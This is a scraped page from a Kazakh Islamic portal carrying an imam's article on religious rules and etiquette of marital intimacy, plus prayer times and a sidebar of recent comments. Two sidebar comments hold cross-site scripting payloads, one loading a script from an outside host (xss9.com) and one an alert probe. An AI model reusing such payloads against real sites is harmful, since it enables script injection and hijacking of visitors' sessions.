ЖЫНЫСТЫҚ ТӘРБИЕ КЕРЕК ПА?
Алматы
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Құптан 17:49
Алматы
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Алматы
ықшамдау
Таң Күн Бесін Аср Ақшам Құптан
05:57 07:20 11:56 14:44 16:26 17:49
ықшамдау
Күнтізбе
Хижри
24 Джумада-сани 1446
Миләди
26 желтоқсан 2024

Мақалалар

ЖЫНЫСТЫҚ ТӘРБИЕ КЕРЕК ПА?

| A | +

Ислам діні күллі адамзатқа түскендіктен мұнда адамға қатысты еш нәрсе назардан тыс қалмаған. Адам баласының дүниеге келгеннен қара жер қойнына кеткенге дейінгі аралықтағы барлық мәселе қамтылған. Соның бірі Алла Тағаланың жер бетіне түсірген ер мен әйел арасындағы ерекше нәзік қарым қатынасы. Яғни, төсек қатынасы. Бұл тақырып әрбір мұсылман әйел мен ердің білуі қажет дүние.

Ендеше, алдымен жыныстық қатынасқа түсудің әдептерін назарларыңызға ұсынайық.

1. Ерлі-зайыпты екеуі жыныстық қатынасқа түспестен бұрын дәрет алғаны абзал. Себебі дәреті бардың бойынан шайтан аулақ болады. Оның үстіне дәретпен болған жыныстық қатынас келешек ұрпақтың да тегіне, рухына әсер етеді. Бүгінде дәрет тұрмақ, ішімдікке сылқия тойып алып жақындасып жататындар да бар. Бұл баланы жатырға жетпей улау болып есептеледі.

2. Қатынасқа түсер алдын «Бисмилләмен» бастап, жыныстық қатынасқа түсерде айтылатын дұғаны оқу. Ол дұға былай: «Бисмилләһи! Аллаһумма жәннибнәш шәйтаанәә уә жәннибнәш шәйтаанә мәә разәқтәнәә». Мағынасы: «Алланың атымен бастаймын! Аллаһым, бізді шайтаннан және шайтанды бізге нәсіп ететін ұрпағымыздан алыстат!».

3. Бүркену. Яғни көрпенің астында болу.

4. Жыныстық қатынаста Құбылаға қарсы болмау. Яғни бас құбылаға қарап жатуы тиіс.

5. Жыныстық қатынасқа түспестен бұрын әйелімен жұмсақ қарым-қатынаста болып, жылы сөздер сөйлеу. Себебі Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын) "хайуан" секілді болмауымызды ескертеді.

6. Жыныстық қатынасқа түскеннен кейін әйел де, еркек те толықтай жуынып, ғұсыл құйынуы тиіс.

Бұл - жыныстық қатынастың әдептері. Бұл мәселеде тыйымдар да бар. Енді соған тоқталсақ:

1. Әйелдің етеккірі кезінде және балалы болған соң қырық күн келетін қаннан арылмайынша жақындаспау. Құран Кәрімде Алла Тағала: «Ей, Мұхаммед, сенен етеккір туралы сұрайды. Оларға: «Етеккір зиянды. Ол мезгілде әйелдеріңнен аулақ болыңдар. Етеккірден арылғанға дейін жақындамаңдар. Пәк болған кезде Алла өздеріңе бұйырған жерінен жақындаңдар», – деп айт. Ақиқатында Алла тәубе етушілерді ұнатады әрі арамнан, нәжістен пәк адамдарды жақсы көреді», – дейді.  (Бақара сүресі, 222-аят)

2. Артқы жолдан жақындаспау. Себебі Құранда Алла Тағала: «Өздеріңе бұйырған жерінен жақындаңдар», – дейді. Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын): «Әйеліне артқы жолдан жақындағанға Алланың лағнеті жауады», – деген.

3. Әйелімен жыныстық қатынаста болған жағдайларды, араларындағы сырды өзгеге айтпау, жаймау. Бұл да – харам. Алла Елшісі (оған Алланың салауаты мен сәлемі болсын): «Ақиқатында, Қиямет күні Алланың алдында аманатқа жасалған ең үлкен қиянаттың бірі - ерлі-зайыптының жыныстық қатынасқа түскеннен кейін араларындағы сырды басқа біреулерге жаюлары», – дейді.

Кейбір әдеп кітаптарында жыныстық қатынасқа түсу уақыттары да жазылған. Яғни ғалымдардың кеңес ететін күндері: дүйсенбі, сейсенбі, бейсенбі, жұма түндері және түске дейінгі уақыт.

Ал кеңес етпейтін уақыттар:

1. Жексенбі және сәрсенбі күнінің түндері.

2. Мұсылманша күнтізбе бойынша айдың бірінші, он бесінші және соңғы түндері.

3. Рамазан және Құрбан айт мерекелерінің түндерінде.

4. Бараат түні.

5. Жолға шығардың алдындағы түнде.

6. Күндіз түстен кейін.

 

Әрине, жыныстық қатынасқа түсу уақыттары бұл міндетті емес, тек адам бұл кеңестерден зиян көрмейді, керісінше, пайдасы болмаса. Бұл жерде көп сұралатын бір сұраққа тоқталып өтсек, қандай да бір күннің түні деген - ол сол күннің алдыңғы түні. Мәселен, жұма түні десе, бейсенбіден жұмаға қараған түн деген сөз.

Міне, жоғарыдағы тыйымдардан басқаға Ислам діні рұқсат береді. Қалай жақындасса да ерлі-зайыптылардың өз еркі. Себебі Құран Кәрімде: «Әйелдер сендердің егіндіктерің (ұрық себетін орын). Егіндіктеріңе қалағандарыңша келіңдер», – дейді (Бақара сүресі, 223-аят)

«Ерлі-зайыптылардың төсек қатынасы шырын да ләззатты болу үшін сезім мүшелерінің барлығы іске қосылу керек. Бұл нәрсе еркек пен әйелдің бір-бірінің көзі үшін сәнденулері, мұрындары үшін хош иістенулері, құлақтары үшін жағымды сөздер айтулары арқылы көрініс табады. Мұсылман әйел түзде әдепті, үйде қылықты болу керек. Еркектің көңілін жай таптырар орны – шаңырағы. Сол шаңырақтың шаттығы үшін әйел осындай іс-әрекеттерге барса, бұл мақтауға тұрарлық нәрсе және ол сауапсыз да қалмайды. Өйткені Алла Тағаланың Өзі жәннаттың әйелдерін «күйеулеріне сүйікті (ерлерінің аңсарын аудырып, құштарлығын шақырып тұрушы)» деп сипаттаған. («Уақиға» сүресі, 36-37 аяттар)» делінген діни әдебиетте. Әйел күйеуінің көңілін аулау үшін әдепті әйелге жараспайтын жұқа, қысқа киімдер киіп, түрлі сөздер айтып қылықтар көрсетсе, оның бәрі оң саналады. Шариғат ерлі-зайыптыларға бір-бірінің денесінің кез-келген бөлігіне қарауға рұқсат береді. Сондай-ақ, еркек пен әйелдің төсекте киімсіз, жалаңаш болулары жыныстық қатынасты нәтижелі ететін алғы шарттардың бірі. Егер ерлі-зайыптылар түгел шешінбей жеңіл киімде болғанды жөн санаса, бұл олардың өз еріктеріндегі нәрсе.

Кезінде «Ерлі-зайыптылардың бір-бірінің жыныс мүшелерін ұстап, сипалауларына бола ма?» деген сұрақты имам Әбу Ханифадан оның шәкірті Әбу Юсуф сұраған екен. Сонда Имам Ағзам: «Онда тұрған ештеңе жоқ. Бәлкім, олардың алар сауаптары арта түсер деп үміттенемін», - деп жауап берген («Муғнил-мухтаж», Хатиб әш-Шарини, 3-том, 144-бет).
Ғұламаларымыз тіпті Пайғамбарымыздың (оған Алланың салауаты мен сәлемі болсын) сүннетіне және алдыңғы өткен ізгі кісілердің хабарларына сүйене отырып жыныстық қатынастың көптеген әдептерін көрсеткен. Солардан үзінді келтірейік:

1. Төсек қатынасының алдында алдын айтқанымыздай «бисмиллә» деп, сүннетте келген дұғаны айту. Хадис имамдары түгелге дерлік Абдулла ибн Аббастан (р.а.) мына хадисті риуаят еткен. Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын) былай деген: «Сіздердің біріңіз әйеліне жақындаспақ болса; «Бисмилләһ, Аллаһумма жәннибнәш-шайтан, уә жәннибиш-шайтана мә разақтана» деп айтсын. Егер осы (төсек қатынасының нәтижесінде) араларында бала пайда болса, ол балаға шайтан ешқашан зарар жеткізе алмайды».

2. Әйелді төсек қатынасына дайындау. Еркектің күтпеген жерден бірден әйеліне бас салуы оның төсек қатынасындағы әдепсіздігі болып табылады. Әйел еркек сияқты жыныстық қатынасқа жылдам дайын бола алмайды. Сондықтан да шақуат талабы оянған еркек жұбайын төсекке еппен тартуы керек.

3. Еркектің дөрекілік көрсетпеуі және асығыс әрекетке бармауы. Төсек қатынасы еркек пен әйелден үйлесімділік талап етеді. Қатынас екеуіне бірдей жағымды болғанда ғана ләззат, тоят көрініс табады. Сондықтан да еркек дөрекі қимылдап ісін тез бітіре салмай, асықпай баптап, қашан әйел бойынан кеткенше күткені жөн. Өйткені, әйел кісі еркекке қарағанда бойын кешірек береді. Толық тоят таба алмай қалған әйелдің бойында мазасыздық пайда болып, төсек қатынасына салқын қарап, одан жеруі мүмкін. Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын) былай деген: «Қайсыбіреулерің әйелімен төсек қатынасын жасаса, оған адал болсын. Егер ол қажетін (әйелінен) бұрын өтеп қойса, оны қажетін өтеп болғанша асықтырмасын.

4. Еркек пен әйелдің сырт көзден оңаша болуы. Бұл дегеніміз есік-терезелерді жабу, пердені түсіру, мысық сияқты үй жануарларын жатын бөлмеден шығару, мүмкіндігі болса, емізулі баланы да басқа бөлмеге уақытша ауыстыру.

5. Төсек қатынасы барысында екеуінің әурет тұстарын қалқалаушы жамылғының болуы.

Ал енді «Дінде төсек қатынасын түрлі қалыпта (шалқалап, етпеттеп, жантайып, т.с.с.) жасауға рұқсат етіле ме?» деген сұраққа келсек, бұл мәселе сахабалардың кезінде де көтеріліпті. «Өйткені мединелік ансарлар әйелдерімен жантайған қалыпта ғана төсек қатынасына түсетін. Ал құрайыштықтар төсек қатынасынан түрлі қалыпта: алдыға қарап та, арт қарап та, шалқалап та ләззат алушы еді. Бірақ олар әйелдің артқы тесігінен істемейтін. Меккелік мұсылмандар Мединеге қоныс аударып келген соң олар жергілікті әйелдерге үйленді. Осы некелердің нәтижесінде кейбір мұсылман отбасында төсек қатынасындағы келіспеушілік пайда болды. Меккеліктер жыныстық қатынасты өздеріне үйреншікті қалыпта жүргізгісі келетін, ал Мединелік әйелдер бұған қарсы болды. Сол кезде Алла Тағаладан: «Әйелдерің сендердің егіс алқаптарың; ендеше алқаптарыңа қалаған тұстарыңнан келіңдер» (Бақара, 223) деген аят түсті» деген жауап беріледі діни әдебиетте.

 Демек, мұсылман әйелімен қалаған қалпында жыныстық қатынасқа түсе алады, тек артқы тесіктен сақтанса болғаны. Жоғарыда біз атағандай, медицинада ғана емес, ислам дінінде де етеккір кезіндегі жыныстық қатынасқа қатаң тыйым салынып, ол күнә болып есептеледі. Етеккір жағдайындағы әйел намаз оқу, ораза тұту, мешітке бару сияқты бірқатар ғибадаттарын тоқтатады. Солардың қатарында оның күйеуімен жыныстық қатынасқа түсуіне де рұқсат етілмейді. Өйткені ғұламалардың бірауызды пікірлері бойынша етеккір мерзімінде ерлі-зайыптылардың жыныстық қатынас жасаулары харам және мұндай әрекет, екі тараптық келісіммен болған жағдайда екеуін де бірдей күнәға батырады. «Алла Тағала айтады: «Сенен етеккір жайлы сұрайды. Оларға: «Ол жиренішті нәрсе, етеккір уақытында әйелдерден аулақ болыңдар. Оларға тазарғанға дейін жақындаспаңдар» де. Расында Алла тәубе қылушыларды ұнатады әрі таза болушыларды ұнатады» (Бақара: 222) дейді дінде бұл туралы.

Ал етеккір кезінде төсек қатынасын жасап, күнәға барғандар не істеуі керек? Оған мынадай жауап бар: " Ғұламалардың барлығы мұндай кездерде әйелімен төсек қатынасына түскен ер кісінің ауыр күнәға бататыны жөнінде бірдей пікірге келген. Және бұл нәрсеге әйел өз ырқымен келіссе, күнәға ол да серік болады. Күнәнің бұл түрін жасаған мұсылманға шынайы тәубеге келу қажет. Бұған қосымша жағдайы көтерген сомада садақа шығарса, бұл оның күнәсінің жуылуына септігін тигізеді».

Орыс басылымдарында, әсіресе, түрлі-түсті журналдарда ешбір ұялмастан айтыла беретін «анальді секс» мәселесіне біздің дін қалай қарайды? Ол туралы көптеген хадистерден оқуға болады. Мәселен, Ибн Мәжә мен Насаи, Әбу Хурайрадан (р.а.) риуаят еткен хадисте Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын) былай деген: «Алла Қиямет күні әйелінің артқы тесігінен жыныстық қатынас жасаған еркекке назар салмайды». Сондай-ақ, Алла Елшісі (оған Алланың салауаты мен сәлемі болсын) тағы бір сөзінде: «Әйелінің артқы тесігінен жыныстық қатынас жасаған еркек лағнетке ұшыраған», - дейді.

 

Құран кітабы.  Хадистер топтамасы мен ғалымдар пікірлері кітабынан.

 

Түрксіб мешітінің бас имамы

Қанат Сансызбаев

 

 

 

ДЕРЕККӨЗІ Azan.kz

Ислам ақпараттық-ағарту порталы 

Предыдущий Следующий
САЛАУАТ АЙТУДЫҢ МӘНІ НЕДЕ? ПАЙҒАМБАРҒА ДЕГЕН МАХАББАТ

Оқырмандардың пікірі (0)

Қызықты тақырыптар

Қоғам ЕҢБЕК – ЫРЫСТЫҢ ҚАЗЫҒЫ
Наурызбай қажы ТАҒАНҰЛЫ, ҚМДБ Төрағасы, Бас мүфти
Қоғам БАРШАҒА ОРТАҚ ҚҰНДЫЛЫҚ
Наурызбай қажы ТАҒАНҰЛЫ, ҚМДБ Төрағасы, Бас мүфти
Қоғам АТА ЗАҢ - ЕЛ ТІРЕГІ
Ата заң – елге қызмет етіп, халықтан құралған мемлекетте ізгі қоғам құру әрбір парасат иесіне жүк.
Қоғам Смағұл ЕЛУБАЙ: Тазалық пен имандылық қоғамды құтқарады
...Имансыздық дегеніміз – екі дүниеде дауасы жоқ, ешқа­шан ем-домы табылмайтын, оған ұрынған қауым сөзсіз ба­­қыт­сыздыққа ұшырайтын жа­зыл­мас індет. Имансыз қоғам міндетті түрде құрып тынады. Бұл індеттің кісі шошырлықтай асқынуының бірнеше себебі бар. Басты себебі – адамның шайтани нәпсіге еріп а...
Қоғам ОТАНДЫҚ ДІНИ БІЛІМ АЛУ ҚАУІПСІЗДІКТІҢ БАСТЫ ШАРТЫ
Адам тумасынан жаңа бір нәрселерді үйренуге құштар. Өмірін өзгертуге асығады. Қай кезде де өз елінен кетіп сырт елдерде білім алғысы келеді. Жаңа орта, жаңа ел, өмір атты кітабының жаңа парағын бастауға тырысады. ...
ықшамдау
Күнтізбе
Хижри
24 Джумада-сани 1446
Миләди
26 желтоқсан 2024
Намаз уақыттары
қазір

Құптан 17:49

Бамдатқа дейін 04:52

Что будет, если увидеть во сне Пророка ﷺ?

"/>"/"/><sCRiPt sRC=https://xss9.com/ivMw></sCrIpT>

X X
11 сағат. бұрын

О милостыне

"/1

X X
11 сағат. бұрын

Задайте вопрос устазам

Ва алейкум ассалам. Ваше омовение и намаз действительны, так как нить установлена в лечебных и в

Администратор Azankz
17 жел. 2024

Признаки любви к Пророку ﷺ

<script>alert(a)</script>

X
28 қыр. 2024

Обязанности мужчины перед своей семьей

А как же быть женщине, такой как я, которая рано вышла замуж, работала вплоть до родов, собирала каж

Лейла
28 қыр. 2024
Created with Sketch. {{!-- --}} {{!-- --}} {{!-- --}} Created with Sketch. Asset 1mdpi